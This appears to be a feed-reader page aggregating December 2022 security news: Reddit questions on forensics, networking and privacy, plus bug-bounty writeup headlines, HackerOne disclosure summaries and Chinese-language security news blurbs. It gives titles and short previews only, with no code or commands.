    I've installed it on a virtual machine. I've set it up but unable to access the web interface. Probably some issue with the IPs while setting up. Can anyone help me out? Its a university project. submitted by /u/Baki_Hanma69 [link] [comments]
    Distance based wifi attennas
    Pardon my ignirance. Can someone point me to a device , anttena, or a combo that can reach far. I habe a wifi network on the otherside of a hallway outside the building i need to reach. Its a two room hallway not very big in width, but its solid concrete. The wifi signal is a out 50-100m outside the window and i need to reach it. Can i get some suggestions or point me to where i can research my needs to reach this wifi. If this isnt the right subreddit can i be pointed correctly. Thank you kindly submitted by /u/donttouchmyhohos [link] [comments]
    Vulnerability Management Automation
    Howdy, i am interested in automating Vulnerability management processes.. So the idea is to have as little human interaction as possible, meaning report sharing or Jira tickets are created automatically to responsible teams. Anyone has any tips or experience? ​ thnx submitted by /u/hannibal_the_general [link] [comments]
    VPN Block by Gov. in Iran
    Title explains everything , below more info : They adopted a new ( maybe new to me ) system of blocking vpns to work. How that works ,I dont know but everything works fine until you turn on vpn and suddenly you get time outs every 4 seconds. There are some vpns that use protocols to evade it but its not available on IOS , only applicable on pc. I dont have IT education bg. I just gather some info on internet just like others. So I cant give more specific info on packets and connections and etc. I wanted to know if there is anyway to backdoor this sort of censorship? Any help appreciated. Extra: I have 2 paid VPN subs. ( Express & Windscribe) Edit: Solved. submitted by /u/No-Magician-4361 [link] [comments]
    How come last pass doesn’t encrypt website urls when they store vault data in the cloud?
    https://blog.lastpass.com/2022/12/notice-of-recent-security-incident/ submitted by /u/Capable-Mongoose [link] [comments]
    Worried about my email and number being related to digital footprint
    Hey so just learned about this digital footprint stuff off of tik tok, and it’s worrying me. I am a theater actor, and just got verified on instagram. I’m worried people can find my accounts now. I have posted stuff to r/confession on here about some personal stuff (which was with a old email and is deleted now) is it good as gone? I’m worried about people finding it, since it’s personal. I had two old emails and used them for burner accounts, if I delete them will it help? And should I get rid of my new email? I use mobile Reddit and social media, I hate my privacy is out too see. Any advice on how to get rid of those post and google searches? None of these emails have my name in it tho submitted by /u/Haunting-Ad-6267 [link] [comments]
  • Open

    The Linux Process Journey — “md” (Multiple Device Driver)
    submitted by /u/boutnaru [link] [comments]
    What is pixel math tag?
    I am doing my school project to determine if my suspect is guilty of owning, accessing and distributing illegal content. I found this URL in the browsing history of my suspect's disk image on Autopsy. I know there is one reddit post about it but that is 6 years ago. There are mentioned of it as a malware link or a mediamath website which is digital advertising company. Does anyone what it is exactly? When I opened the link, it is just a blank page. Open it at your own risk...URL: https://pixel.mathtag.com/sync/iframe?mt_uuid=e8c15864-67e3-4600-915d-27917d2d316d&no_iframe=1&mt_adid=176084 submitted by /u/AlienDumpling [link] [comments]
    Export Whatsapp chat with replies from an iPhone
    I'm trying to export a Whatsapp chat from an iPhone Xr with iOS 15.6 including replies to messages. I tried to explore the ChatStorage.sqlite db trying to understand how does it works but it's very "messy"! ​ After a while, I succeded in understanding how do it works but I really can't understand how does Whatsapp store replies to messages. The only thing I noticed its that whenever a message is a reply to another message (also when a media is attached to a message, so, more generally, whenever the "graphic thing" is on top of a message), in the ZWAMESSAGE table under ZMEDIAITEM column, a value appear, which is the Z_PK value of an entry on the ZWAMEDIAITEM table. Unfortunately this last table seems to only show informations about messages with media, as every message that should be a reply, in this table has nearly every value set to null. Also tried googling a bit, but I couldn't find anything. ​ Could you help me to understand replies in Whatsapp database please? submitted by /u/Crihexe [link] [comments]
    Recovering Deleted Files Using FTK Imager
    How do you recover deleted files using the FTK Imager tool? Please describe the process step-by-step in the most straightforward manner possible. submitted by /u/Suspicious_Cheek_873 [link] [comments]
  • Open

    $350 XSS in 15 minutes
    Bug Bounty Writeup about DOM XSS via JSONP + Parameter pollution Continue reading on Medium »
    How these IDOR vulnerability earned 5000$ | Hackerone Reddit Bug Bounty
    Modifying any users custom profile links Continue reading on InfoSec Write-ups »
    Katana Framework: How To Use It To Scan And Mass Collect Website Data
    Hi guys 🙏, today we will see the installation and basic usage of Katana tool. Continue reading on Medium »
    OTP Bypassing and Vulnerabilities from E-Mail fields.
    What is Authentication? Continue reading on Medium »
    Bug Zero at a Glance [Weeks 10–16 and 17–23 December]
    What happened with Bug Zero? Continue reading on Bug Zero »
    Starting Bug Bounty from Scratch
    Start with basics! Continue reading on Medium »
    Top 7 Tips to Succeed in Bug Bounty Programs
    Writing a technical write-up for a bug bounty program can be a daunting task, especially if you are new to the field of cybersecurity… Continue reading on Medium »
    Програмата Masa Bug Bounty вече е отворена
    Masa официално стартира нашата текуща програма за награди за грешки, която вече е отворена за участие на общността. Ние също така… Continue reading on Medium »
  • Open

    Fast OSINT with Social Analyzer and 1,000+ social networks — Install and webapp
    Continue reading on Medium »
    Geolocation OSINT
    Een tijd geleden ontving ik van vrienden, vanaf hun vakantieadres, bovenstaande foto. Nieuwsgierig als ik was wilde ik met mijn OSINT… Continue reading on Medium »
  • Open

    PyRDP 1.2.0 released – Can perform Net-NTLM hash capture before the certificate error on RDP
    submitted by /u/obilodeau [link] [comments]
    FIN7 Unveiled - A deep dive into notorious cybercrime gang
    submitted by /u/wtfse [link] [comments]
    Introducing the Columbus Project
    submitted by /u/g0rbe [link] [comments]
  • Open

    How these IDOR vulnerability earned 5000$ | Hackerone Reddit Bug Bounty
    No content preview
    Advent of Cyber 2022 [Day 22] Attack Surface | Reduction Threats are failing all around me-Simple…
    No content preview
    Everything about Docker Security
    Photo by Hacker Noon on Unsplash Continue reading on InfoSec Write-ups »
    ❗️Capture The Ether ❗️— Token Sale [Difficulty = Low-Medium]
    No content preview
    Advent of Cyber 2022 [Day 23] Defence in Depth | Mission ELFPossible: Abominable for a Day-Simple…
    No content preview
  • Open

    How these IDOR vulnerability earned 5000$ | Hackerone Reddit Bug Bounty
    No content preview
    Advent of Cyber 2022 [Day 22] Attack Surface | Reduction Threats are failing all around me-Simple…
    No content preview
    Everything about Docker Security
    Photo by Hacker Noon on Unsplash Continue reading on InfoSec Write-ups »
    ❗️Capture The Ether ❗️— Token Sale [Difficulty = Low-Medium]
    No content preview
    Advent of Cyber 2022 [Day 23] Defence in Depth | Mission ELFPossible: Abominable for a Day-Simple…
    No content preview
  • Open

    How these IDOR vulnerability earned 5000$ | Hackerone Reddit Bug Bounty
    No content preview
    Advent of Cyber 2022 [Day 22] Attack Surface | Reduction Threats are failing all around me-Simple…
    No content preview
    Everything about Docker Security
    Photo by Hacker Noon on Unsplash Continue reading on InfoSec Write-ups »
    ❗️Capture The Ether ❗️— Token Sale [Difficulty = Low-Medium]
    No content preview
    Advent of Cyber 2022 [Day 23] Defence in Depth | Mission ELFPossible: Abominable for a Day-Simple…
    No content preview
  • Open

    SecWiki News 2022-12-23 Review
    CodeQL的自动化代码审计之路(下篇) by ourren ENRE: 一个可扩展的实体关系提取框架工具 by ourren 产品管理方法论(下):规划的逻辑 & 研发的架构 by ourren 产品管理方法论(中) by ourren 产品管理方法论(上) by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-23 Review
    CodeQL的自动化代码审计之路(下篇) by ourren ENRE: 一个可扩展的实体关系提取框架工具 by ourren 产品管理方法论(下):规划的逻辑 & 研发的架构 by ourren 产品管理方法论(中) by ourren 产品管理方法论(上) by ourren 更多最新文章,请访问SecWiki
  • Open

    RatInject — Red Team Tool
    Introduction Continue reading on Medium »
  • Open

    慢雾:朝鲜 APT 组织对 NFT 用户大规模钓鱼分析
    本文仅针对其中一部分 NFT 钓鱼素材进行分析,并提炼出朝鲜黑客的部分钓鱼特征。
    Apache ShardingSphere-Proxy MYSQL身份验证绕过漏洞(CVE-2022-45347)
    ShardingSphere-Proxy在进行MySQL客户端认证失败后,没有彻底清除会话,攻击者可以通过构造一个特殊的mysql客户端来绕过身份认证执行sql语句。
    网络安全架构之系统层安全
    网络安全架构图是按照现有网络安全需求整理,通过多个维度展现。
    FreeBuf周报 | 阿里云香港服务器现“史诗级”宕机;蔚来汽车遭遇勒索攻击
    总结推荐本周的热点资讯、安全事件、一周好文和省心工具,保证大家不错过本周的每一个重点!
    博彩公司 BetMGM 发生数据泄露,“赌徒”面临网络风险
    著名体育博彩公司 BetMGM 发生一起数据泄露事件,一名威胁攻击者成功窃取其大量用户个人信息。
    Lastpass事件调查:黑客在云存储漏洞中窃取了保险库数据
    威胁者复制了客户基本账户信息和相关元数据的信息,包括公司名称、最终用户名称、账单地址、电子邮件地址、电话号码等信息。
  • Open

    FuzzingWeekly CW 51: How Fuzzing Helped Me Get My First Bounty
    How Fuzzing Helped Me to Get My First Bounty: https://infosecwriteups.com/how-fuzzing-helps-me-to-get-my-first-bounty-2c63eb864e08 Continue reading on Medium »
  • Open

    FuzzingWeekly CW 51: How Fuzzing Helped Me Get My First Bounty
    How Fuzzing Helped Me to Get My First Bounty: https://infosecwriteups.com/how-fuzzing-helps-me-to-get-my-first-bounty-2c63eb864e08 Continue reading on Medium »
  • Open

    Fuzzing helped me get my first bounty: Fuzzing Weekly CW 51
    Article URL: https://ioc.exchange/@FuzzingWeekly/109562456353714356 Comments URL: https://news.ycombinator.com/item?id=34104179 Points: 1 # Comments: 0
  • Open

    Secret API Key is logged in cleartext
    Omise disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1662194 - Bounty: $200
    xss due to incorrect handling of postmessages
    Khan Academy disclosed a bug submitted by moom825: https://hackerone.com/reports/1758132
  • Open

    StealthHook - 一种在不修改内存保护的情况下挂钩函数的方法
    作者:The_Itach1@知道创宇404实验室 日期:2022年12月23日 最近看了一下x86matthew关于hook方法的一篇文章https://www.x86matthew.com/view_post?id=stealth_hook,相对于传统的一些hook方式,个人认为StealthHook的最大优点并不在于不修改内存保护,而是其隐蔽性,这种hook方式是难以检测的,因为其没有直...
  • Open

    StealthHook - 一种在不修改内存保护的情况下挂钩函数的方法
    作者:The_Itach1@知道创宇404实验室 日期:2022年12月23日 最近看了一下x86matthew关于hook方法的一篇文章https://www.x86matthew.com/view_post?id=stealth_hook,相对于传统的一些hook方式,个人认为StealthHook的最大优点并不在于不修改内存保护,而是其隐蔽性,这种hook方式是难以检测的,因为其没有直...
  • Open

    Ask HN: How can a game with big vulnerability can be still sold?
    https://www.cvedetails.com/cve/CVE-2018-10718 https://www.cvedetails.com/cve/CVE-2019-20893/ https://steamcommunity.com/id/Wackiiy/recommended/10180/ or is this a past thing and fixed? I have not found any info about that it has been fixed. Comments URL: https://news.ycombinator.com/item?id=34101899 Points: 3 # Comments: 0
  • Open

    Threat Brief: OWASSRF Vulnerability Exploitation
    We analyze the new exploit method for Microsoft Exchange Server, OWASSRF, noting that all exploit attempts we've observed use the same PowerShell backdoor, which we track as SilverArrow. Read the details and learn how to mitigate. The post Threat Brief: OWASSRF Vulnerability Exploitation appeared first on Unit 42.

  • Open

    [Hiring] InfoSec Assurance Roles in USA and Europe
    submitted by /u/RecruitingAdmin [link] [comments]
    Lastpass Security Incident - December 22 update
    submitted by /u/tkokilroy [link] [comments]
    Attack of the clones - Stealthy Kubernetes persistence with eathar, tòcan and teisteanas
    submitted by /u/raesene2 [link] [comments]
    [x-post from blueteamsec] I started a newsletter that aggregates Detection Engineering news and techniques. Here’s the latest Issue. Let me know what you think!
    submitted by /u/dudeimawizard [link] [comments]
    Cross-tenant network bypass in Azure Cognitive Search
    submitted by /u/FrankTr3nd [link] [comments]
    GLPI Exploitation Timeline
    submitted by /u/chicksdigthelongrun [link] [comments]
    Puckungfu: A NETGEAR WAN Command Injection
    Yet another Pwn2Own vulnerability patched days before the competition (https://twitter.com/_mccaulay/status/1605886785015480320) submitted by /u/ArbitraryWrite [link] [comments]
  • Open

    Linux Kernel Ksmbd Use-After-Free Remote Code Execution Vulnerability
    Article URL: https://www.zerodayinitiative.com/advisories/ZDI-22-1690/ Comments URL: https://news.ycombinator.com/item?id=34098804 Points: 59 # Comments: 37
    Critical Microsoft Code-Execution Vulnerability
    Article URL: https://www.schneier.com/blog/archives/2022/12/critical-microsoft-code-execution-vulnerability.html Comments URL: https://news.ycombinator.com/item?id=34092892 Points: 7 # Comments: 0
  • Open

    OSINT
    osint, short for open-source intelligence, is data that has been obtained from publicly available sources. osint is widely used by law… Continue reading on Medium »
    Ghyophoggua DEVS ARE FOOL!
    The best way to prevent a Hecker is to make unique Directory ex Continue reading on Medium »
    PAI Research Process, part 3
    Be aware of your own cognitive biases and do not be so set in your ways that you resist trying new processes. Continue reading on Medium »
    Best OSINT Tools and Resources for Hacker
    OSINT Framework — https://osintframework.com/ Continue reading on Medium »
  • Open

    Forensic Tool to Analyze PST / Mailboxes
    Hi all. I am initiating in forensic discipline and would like some advice, please. Here is my situation. In the company that I work for, sometimes we need to investigate the employees' mailboxes due to whistleblowing and other compliance cases. The IT department provide us with a copy of the user mailbox extracted from their O365 account. The data is provided in the PST format. However, the audit team is analyzing the e-mails using Outlook installed on their computers and we are having some problems like file corruption, outlook freezing, and slow searches. Can you suggest a user-friendly and low-cost solution to perform this kind of e-mail/PST analysis? Thanks all! submitted by /u/Heretic_Dude [link] [comments]
    How does the thumbcache really work ?
    I ask because it seems random, last time it was updated was 2 days ago, even if i open images or eplorer with different icon sizes etc nothing happen submitted by /u/SavingsVersion3934 [link] [comments]
    UFS explorer still find large files on ssd even after retrim command with powershell
    How is it technically possible ? submitted by /u/SavingsVersion3934 [link] [comments]
    The Windows Process Journey — dwm.exe (Desktop Window Manager)
    submitted by /u/boutnaru [link] [comments]
  • Open

    Managing Pages
    GitHub disclosed a bug submitted by ali_shehab: https://hackerone.com/reports/1690427 - Bounty: $7500
  • Open

    HTTP Header Injection
    What is HTTP Header Injection? Continue reading on InfoSec Write-ups »
    Upgrading Kali Linux to the latest version
    No content preview
    Advent of Cyber 2022 [Day 21] MQTT | Have yourself a merry little webcam-Simple Write up
    No content preview
  • Open

    HTTP Header Injection
    What is HTTP Header Injection? Continue reading on InfoSec Write-ups »
    Upgrading Kali Linux to the latest version
    No content preview
    Advent of Cyber 2022 [Day 21] MQTT | Have yourself a merry little webcam-Simple Write up
    No content preview
  • Open

    HTTP Header Injection
    What is HTTP Header Injection? Continue reading on InfoSec Write-ups »
    Upgrading Kali Linux to the latest version
    No content preview
    Advent of Cyber 2022 [Day 21] MQTT | Have yourself a merry little webcam-Simple Write up
    No content preview
  • Open

    SecWiki News 2022-12-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-22 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    iPhone question
    Hello! Outside of state governments coordinating with factories at the production level and stuff like that, there’s, on average, a very low chance that someone could take a new iPhone, think iPhone XR when the iPhone box was wrapped in plastic shrink wrap, infect it with a virus or tracking software or something when it is still in the welcome / setup mode at the beginning when you register for an Apple ID and all of that, have it still be in the welcome mode, and then put the phone back in the box and then wrap it in shrink wrap again to make it look new? I know a crazy scenario but I just wanted to know. I’m sure anything is possible technically but wanted to know thoughts. I know iPhones are generally secure I just wanted to know. Thank you!!! submitted by /u/Normal-Question-1994 [link] [comments]
    What Shouldn't Endpoint Protection be installed on? Appliances, VM Cluster Hosts, Firewalls?
    We're running a Palo Alto Cortex anti-malware agent installed on ~500 servers and it's not installed on every "server" on our multiple asset lists, but it shouldn't be installed on EVERYTHING, right? We've got network authentication appliances (Aruba Clearpass), dns internet filters (Cisco Umbrella), servers for SIP Trunking and VOIP stuff, Oracle Database Appliances. So far it hasn't given us much problems but what is the 1000-IQ theory of action here? submitted by /u/sysbaddmin [link] [comments]
    Resume Format for Cyber Security Analyst?
    Does anyone have Resume Format for cyber security analyst, for those people who are currently working as different profession but managed to learn about EH by self. submitted by /u/Cyb3r1nd1an [link] [comments]
    How integrating TheHive with MISP or/and Cortext actually works?
    Hello guys, while doing my project for work, a few questions arose, and will be more than happy to get some information or useful tips from people with experience with the technologies or in the field! :) The SOAR we are going to use is Shuffle. What can be achieved with those integrations and what are the differences? How do those systems work together in the SOC environment? Are the cases updated automatically in TheHive with the information from MISP/Cortex or should they be configured to be updated automatically if certain conditions are matched with a SOAR? Is it a good practice to use both MISP and Cortex and how do they work together and whats the difference? submitted by /u/tryingtoworkatm [link] [comments]
  • Open

    Hack Analysis: Omni Protocol, July 2022
    Introduction Continue reading on Immunefi »
  • Open

    Java Claus is back with a fuzzing tutorial
    Article URL: https://www.youtube.com/watch?v=rYSvBANQBB0 Comments URL: https://news.ycombinator.com/item?id=34093239 Points: 1 # Comments: 0
  • Open

    AzureHound:一款针对Microsoft Azure的BloodHound数据收集工具
    在AzureHound的帮助下,广大研究人员可以轻松管理和审查与Azure相关的安全状态。
    漏洞复现|Django--CVE-2022-28346
    漏洞复现|Django-CVE-2022-28346一,漏洞概述Django 是用 Python 开发的一个免费开源的 Web 框架,几乎囊括了 Web 应用的方方面面,可以用于快速搭建高性能、优雅的网站,Django 提供了许多网站后台开发经常用到的模块,使开发者能够专注于业务部分。二,漏洞原理精心编制的字典, 通过**kwargs传递给QuerySet.annotate()、aggregate
    漏洞复现|shiro--CVE-2022-32532
    根据java正则表达式的特点,在正则表达式中元字符.是匹配除换行符之外的任何单个字符。
    FreeBuf早报 | 俄黑客组织Killnet声称窃取FBI上万特工数据;2023年网安市场十大预测
    知名的俄罗斯 Killnet 黑客泄露了一个文本文件,其中显示了他们声称是 FBI 特工的 10000 人的登录凭据。
    大国摩擦背后,APT组织在打什么如意算盘?| FreeBuf咨询洞察
    APT攻击行为往往经过长期的经营与策划,且具备高度隐蔽性。
    谈数据泄露、勒索和云故障 | FB甲方群话题讨论
    各位 Buffer 晚上好,FreeBuf 甲方群话题讨论第 200 期来了!
    深入分析SEAndroid中的安全风险与关闭姿势
    无恒实验室在近期的安全研究中,对于SELinux的攻击面和攻击方法有一些研究成果,特此分享给大家,希望与业内进行学习交流。
    Python 供应链攻击层出不穷,研究人员又发现一例
    2022 年 12 月 9 日,研究人员在 PyPI 中发现又一个供应链攻击。
    “拳打”苹果,“脚踩”索尼,天才黑客 George Hotz 从Twitter 辞职
    天才黑客 George Hotz 突然从Twitter辞职的消息在圈内引起广泛讨论。
    鞋类品牌Ecco在500天内泄露超60GB敏感数据
    研究人员表示,不仅任何人都可能修改数据,而且服务器的配置错误很可能会使公司遭受攻击,从而波及世界各地的客户。
  • Open

    Puckungfu: A NETGEAR WAN Command Injection
    Yet another Pwn2Own vulnerability patched days before the competition (https://twitter.com/_mccaulay/status/1605886785015480320) submitted by /u/ArbitraryWrite [link] [comments]

  • Open

    Mass account takeover!
    Stripe disclosed a bug submitted by akashhamal0x01: https://hackerone.com/reports/1634165 - Bounty: $4000
    Stored cross-site scripting in dataset owner.
    Quantopian disclosed a bug submitted by irisrumtub: https://hackerone.com/reports/708123 - Bounty: $1925
    Ability to perform various POST requests on quantopian.com as a different user - insecure by design.
    Quantopian disclosed a bug submitted by irisrumtub: https://hackerone.com/reports/837328 - Bounty: $1050
    Cross-site scripting via hardcoded front-end watched expression.
    Quantopian disclosed a bug submitted by irisrumtub: https://hackerone.com/reports/684544 - Bounty: $1225
    Cross-site scripting on algorithm collaborator
    Quantopian disclosed a bug submitted by irisrumtub: https://hackerone.com/reports/615672 - Bounty: $2100
    Host header injection that bypassed protection and allowed accessing multiple subdomains
    Urban Company disclosed a bug submitted by musashi42: https://hackerone.com/reports/1783015 - Bounty: $500
    CVE-2022-43551: Another HSTS bypass via IDN
    curl disclosed a bug submitted by kurohiro: https://hackerone.com/reports/1755083
  • Open

    Burp Suite: Best Bug Bounty tool?
    Lots of B’s in the title. You’d think this was a hive. Haha? no? sorry Continue reading on Medium »
    Protecting Your Supply Chain: Essential Strategies for Ensuring Security
    Earlier this month, a ransomware attack occurred at Mercury IT, a managed service provider based in New Zealand with 25 employees. This… Continue reading on Medium »
    My First Bug in Bugcrowd
    Hi everybody Continue reading on Medium »
    Zero Click To Account Takeover (IDOR + XSS)
    Use IDOR & stored XSS to takeover victim account without any user interaction!! Continue reading on System Weakness »
    Our Top 5 favorites Mobile Hacking Tools
    Hacking tools very useful for mobile security. Continue reading on Medium »
    RCE on admin panel of web3 website
    Hello Hackers… Continue reading on Medium »
    Mise à jour du site Web et Événement Bug Bounty
    Bonjour, communauté Matrix ! Continue reading on Medium »
    DAYSTARTER, Bug Bounty Has Started!
    DAYSTARTER, Bug Bounty Has Started! Continue reading on Medium »
    데이스타터, 버그바운티 프로그램 시작
    데이스타터, 버그바운티 프로그램 시작 Continue reading on Medium »
    Christmas holidays with PVS-Studio
    In the eve of the Christmas holidays, our team have prepared various treats and gifts for you. Continue reading to find out which ones! Continue reading on PVS-Studio »
    Account Takeover and Two-Factor Authentication Bypass
    In September I decided to search in recovery flow processes in web and mobile Facebook application. Continue reading on Medium »
  • Open

    ACSC 'Essential Eight' Definition of Network Devices
    Hi Everyone, We are looking to start aligning and reporting against the ASCS Essential Eight framework. It's pretty straight forward, but there is one part we cant agree on how to interpret the requirements. They mention 'Network Devices' in a few of the Requirements. Such as "Patches, updates or vendor mitigations for security vulnerabilities in operating systems of workstations, servers and network devices are applied within one month of release." We are split in our thinking. In this context, are Network Devices: Every device 'plugged' into the network. Servers, end user devices, Printers, IOT.... Network Infrastructure devices ie. Switches, Routers, Firewalls, Access Points. Thanks for any assistance you can provide. submitted by /u/TimBix [link] [comments]
    Would anyone mind reviewing my resume and letting me know your thoughts? Cause I may start looking for new opportunity next year.
    Here: https://imgur.com/a/Kaaeqb8 submitted by /u/No-job-no-money [link] [comments]
    Do hackers target specific individuals or do they mass-hack somehow?
    So my Facebook account got hacked yesterday. I’m not 100% sure as the email from Facebook says the login was blocked, yet it does show up in my Facebook activity log. They also didn’t log out & didn’t change my password. Now I’m wondering; what do hackers gain from this? My account doesn’t have my full name, no pics, and only 3 friends. So I’m doubtful someone targeted me specifically. So what do professional hackers gain from this then? And how do they find the accounts to target? And why is it so that they don’t always do something at all, like in my case? I’ve checked whether my email is pwned and it wasn’t. Also I did have an easy password (but not a general one like abc123 or something, but no numbers or capital letters or symbols), and no 2FA (on all my emails and my other social media I do, but because I barely use Facebook I haven’t bothered to set it up and make a hard password until yesterday). submitted by /u/IDontAgreeSorry [link] [comments]
    Using Nmap Scripting enigine
    Found this old video of someone explaining: a) What the Nmap scripting engine is in a much smarter way than usual. b) A very interesting way of searching through them I had never seen/thought of. TL;DR Definitely worth watching!!!! https://www.youtube.com/watch?v=BeZzi8zyZZc submitted by /u/0rekcaH1 [link] [comments]
    Anyone else have issues with Sucuri / GoDaddy hosting? Sucuri possibly hacked?
    I am currently seeing something that looks like cache poisoning with Sucuri and GoDaddy hosting. Randomly my sites will go down and get replaced with a malicious link with popups. Sucuri has currently admitted that something is going on and they removed malicious content but at the same time they are saying the site is not at risk (what??). We have people alerting us that they are literally getting malicious popups (so how is that not at risk??). Sucuri is being about as transparent as concrete about this. Anyone else dealing with this? submitted by /u/paack [link] [comments]
  • Open

    SecWiki News 2022-12-21 Review
    机构财报中的开源情报挖掘 by ourren Kaggle知识点:Sklearn异常检测方法 by ourren 窥探大型公共DNS解析器的缓存 by ourren Thinkphp3.2.3 SQL注入总结 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-12-21 Review
    机构财报中的开源情报挖掘 by ourren Kaggle知识点:Sklearn异常检测方法 by ourren 窥探大型公共DNS解析器的缓存 by ourren Thinkphp3.2.3 SQL注入总结 by SecIN社区 更多最新文章,请访问SecWiki
  • Open

    A journey into IoT - Unknown Chinese alarm - Part 4 - Internal communications
    submitted by /u/0xdea [link] [comments]
    Deconstructing and Exploiting CVE-2020-6418
    submitted by /u/surrealisticpillow12 [link] [comments]
    DirtyCred Remastered: UAF to LPE (CVE-2022-2602)
    submitted by /u/Void_Sec [link] [comments]
    Cisco BroadWorks CommPilot Application Software Unauthenticated Server-Side Request Forgery (CVE-2022-20951)
    submitted by /u/smaury [link] [comments]
    Exploring the depths of Istio: A researcher's guide to analyzing a caching vulnerability
    submitted by /u/jat0369 [link] [comments]
  • Open

    Become an OSINT Expert: A Comprehensive Guide to the Best Learning Resources
    As the world becomes increasingly digitized, the ability to effectively gather and analyze information from publicly available sources —… Continue reading on Medium »
  • Open

    Creating Trojan Virus in 5 minutes
    Introduction Continue reading on Medium »
    ACTIVE DIRECTORY 101
    This blog is part of a series on Active Directory Security and Red Teaming designed to introduce you to Active Directory and Active… Continue reading on Medium »
  • Open

    Meddler-in-the-Middle Phishing Attacks Explained
    Meddler-in-the-Middle (MitM) phishing attacks show how threat actors find ways to get around traditional defenses and advice. The post Meddler-in-the-Middle Phishing Attacks Explained appeared first on Unit 42.
  • Open

    Advent of Cyber 2022 [Day 20] Firmware | Binwalkin’ around the Christmas tree-Simple Write up
    No content preview
    TryHackMe — Warzone 2 Write-up with Answers
    No content preview
    How to spy on people on iOS
    No content preview
  • Open

    Advent of Cyber 2022 [Day 20] Firmware | Binwalkin’ around the Christmas tree-Simple Write up
    No content preview
    TryHackMe — Warzone 2 Write-up with Answers
    No content preview
    How to spy on people on iOS
    No content preview
  • Open

    Advent of Cyber 2022 [Day 20] Firmware | Binwalkin’ around the Christmas tree-Simple Write up
    No content preview
    TryHackMe — Warzone 2 Write-up with Answers
    No content preview
    How to spy on people on iOS
    No content preview
  • Open

    Systemd-coredump: CVE-2022-4415: local information leak
    Article URL: https://www.openwall.com/lists/oss-security/2022/12/21/3 Comments URL: https://news.ycombinator.com/item?id=34079682 Points: 85 # Comments: 44
  • Open

    FreeBuf早报 | GitHub 存储库被黑Okta源代码泄露;85%的攻击使用加密通道
    身份验证服务和身份与访问管理 (IAM) 解决方案的领先提供商 Okta 表示,其私人 GitHub 存储库本月遭到黑客攻击,攻击者窃取了 Okta 的源代码。
    从JDK源码来看XXE的触发原理和对应的防御手段
    本文主要是对其中有关于XXE中的两点sink进行几点分析。
    你怎么看?张小龙推出微信键盘,不为市场只为保护用户隐私
    隐私保护,将会成为微信键盘打败其他输入法的杀手锏。
    大国摩擦背后,APT组织在打什么如意算盘?| FreeBuf咨询洞察
    APT攻击行为往往经过长期的经营与策划,且具备高度隐蔽性。
    俄罗斯黑客在俄乌战争期间瞄准了北约的炼油厂
    这次攻击发生在 2022 年 8 月 30 日,是俄罗斯联邦安全局 ( FSB ) 的高级持续威胁 (APT) 精心策划的多次攻击之一。
    报名开启 | “贝壳安全TIME”—第二届白帽峰会暨BKSRC三周年生日庆典
    “贝壳安全TIME”—第二届白帽峰会 暨BKSRC三周年生日庆典 让我们线上欢聚 立足新起点,共创新辉煌!
    蔚来汽车遭遇勒索攻击,车主数据已泄露
    经过蔚来汽车内部初步的调查,承认被窃取的数据为2021年8月之前的部分用户基本信息和车辆销售信息。
    Camille:隐私合规检测工具
    基于Frida的Android App隐私合规检测辅助工具,camille可以hook住Android敏感接口,检测是否第三方SDK调用。根据隐私合规的场景,辅助检查是否符合隐私合规标准。
  • Open

    Windows Privilege Escalation: Server Operator Group
    Background: The Windows Server operating system uses two types of security principals for authentication and authorization: user accounts and computer accounts. These accounts are created
    Windows Privilege Escalation: Server Operator Group
    Background: The Windows Server operating system uses two types of security principals for authentication and authorization: user accounts and computer accounts. These accounts are created
  • Open

    40+ digital forensics conferences in 2023
    submitted by /u/raydenvm [link] [comments]
    Help with CyberChef Challenge #16
    It's me again, now I'm stuck on #16. I've figured out (from base64>bzip2 decompress>from base32) but from there I'm lost. I've messed around in CyberChef and thrown everything at the wall with no luck. Any ideas? submitted by /u/circuitidiot [link] [comments]

  • Open

    New Chaes campaign uses Windows Management Instrumentation Command-Line Utility
    submitted by /u/PENGUINPLOW [link] [comments]
    Validating Okta Access Tokens in Python with PyJWT
    submitted by /u/csanders_ [link] [comments]
    Bypass iOS backup's TCC protection
    submitted by /u/surrealisticpillow12 [link] [comments]
    Using Leaking Sentinel Value to Bypass the Latest Chrome v8 HardenProtect
    submitted by /u/surrealisticpillow12 [link] [comments]
    OSV-Scanner: A vulnerability scanner written in Go which uses the data provided by OSV.dev
    submitted by /u/Titokhan [link] [comments]
    Writeup about an authentication bypass and privilege escalation in the Passwordstate password manager
    submitted by /u/parzel [link] [comments]
    Intro to Embedded RE: UART Discovery and Firmware Extraction via UBoot
    submitted by /u/wrongbaud [link] [comments]
  • Open

    Unauthorized Canceling/Unsubscribe TaxJar account & Payment information DIsclosure
    Stripe disclosed a bug submitted by mr_asg: https://hackerone.com/reports/1679124 - Bounty: $500
    [Broken Access Control ] Unauthorized Linking accounts & Linked Accounts info DIsclosure
    Stripe disclosed a bug submitted by mr_asg: https://hackerone.com/reports/1672614 - Bounty: $250
    Missing length validation of user displayname allows to generate an SQL error
    Nextcloud disclosed a bug submitted by errorx404: https://hackerone.com/reports/1588562
  • Open

    BlockPI Network Bekerja dengan Immunefi untuk Meluncurkan Bug Bounty
    Kami dengan senang hati mengumumkan peluncuran program bug bounty kami dengan platform bug bounty terkemuka Web3, Immunefi. Pengguna dan… Continue reading on Medium »
    How Capabilities actually Work ? | Exploitation | Privilege Escalation
    Continue reading on Medium »
    In this article, I’ll tell you how I got a 4 digits(₹) bounty from an Indian company.
    What is Broken Link Hijacking? Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page. Broken Link… Continue reading on Medium »
    How I found my first XSS on a Bug Bounty Program
    Hello there, Welcome back to my Article. Continue reading on Medium »
    How I got my SIDN Swag
    Hello guys, how are you? I’m writing an article after a very long time. Continue reading on Medium »
    Como procurar falhas SSRF de maneira efetiva?
    SSRF, ou Server-Side Request Forgery, é um tipo de ataque cibernético que permite a um invasor enviar solicitações de um servidor para… Continue reading on Medium »
    process injection enumeration tool
    Wanderer Continue reading on Medium »
    ONLYOFFICE on HackerOne: 2022 overview
    About ONLYOFFICE bounty program Continue reading on ONLYOFFICE »
    Everything about Cookie and Its Security
    What is a cookie and why is it used? Continue reading on InfoSec Write-ups »
  • Open

    Jackbox script
